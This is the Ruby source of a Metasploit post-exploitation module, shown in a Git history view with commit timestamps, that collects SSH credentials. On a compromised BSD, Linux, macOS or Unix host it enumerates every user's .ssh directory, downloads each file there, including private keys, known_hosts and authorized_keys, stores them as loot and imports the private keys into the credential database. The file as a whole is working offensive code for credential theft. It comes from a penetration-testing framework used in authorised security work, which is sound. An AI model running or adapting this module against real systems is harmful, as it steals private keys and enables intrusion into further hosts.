metasploit-framework/modules/post/multi/gather/ssh_creds.rb

89 lines
2.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'sshkey'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
2013-09-05 18:41:25 +00:00
include Msf::Post::File
include Msf::Post::Unix
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info(info,
'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',
'Description' => %q{
This module will collect the contents of all users' .ssh directories on the targeted
machine. Additionally, known_hosts and authorized_keys and any other files are also
downloaded. This module is largely based on firefox_creds.rb.
},
'License' => MSF_LICENSE,
'Author' => ['Jim Halfpenny'],
'Platform' => %w{ bsd linux osx unix },
2013-08-30 21:28:54 +00:00
'SessionTypes' => ['meterpreter', 'shell' ]
))
end
2013-08-30 21:28:54 +00:00
def run
print_status("Finding .ssh directories")
paths = enum_user_directories.map {|d| d + "/.ssh"}
# Array#select! is only in 1.9
paths = paths.select { |d| directory?(d) }
2013-08-30 21:28:54 +00:00
if paths.nil? or paths.empty?
print_error("No users found with a .ssh directory")
return
end
2013-08-30 21:28:54 +00:00
download_loot(paths)
end
2013-08-30 21:28:54 +00:00
def download_loot(paths)
print_status("Looting #{paths.count} directories")
paths.each do |path|
path.chomp!
if session.type == "meterpreter"
sep = session.fs.file.separator
files = session.fs.dir.entries(path)
else
# Guess, but it's probably right
sep = "/"
files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
end
path_array = path.split(sep)
path_array.pop
user = path_array.pop
files.each do |file|
next if [".", ".."].include?(file)
data = read_file("#{path}#{sep}#{file}")
file = file.split(sep).last
loot_path = store_loot("ssh.#{file}", "text/plain", session, data, "ssh_#{file}", "OpenSSH #{file} File")
print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
begin
key = SSHKey.new(data, :passphrase => "")
credential_data = {
origin_type: :session,
session_id: session_db_id,
post_reference_name: self.refname,
private_type: :ssh_key,
private_data: key.key_object.to_s,
username: user,
workspace_id: myworkspace_id
2013-08-30 21:28:54 +00:00
}
create_credential(credential_data)
rescue OpenSSL::OpenSSLError => e
print_error("Could not load SSH Key: #{e.message}")
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
end
end
end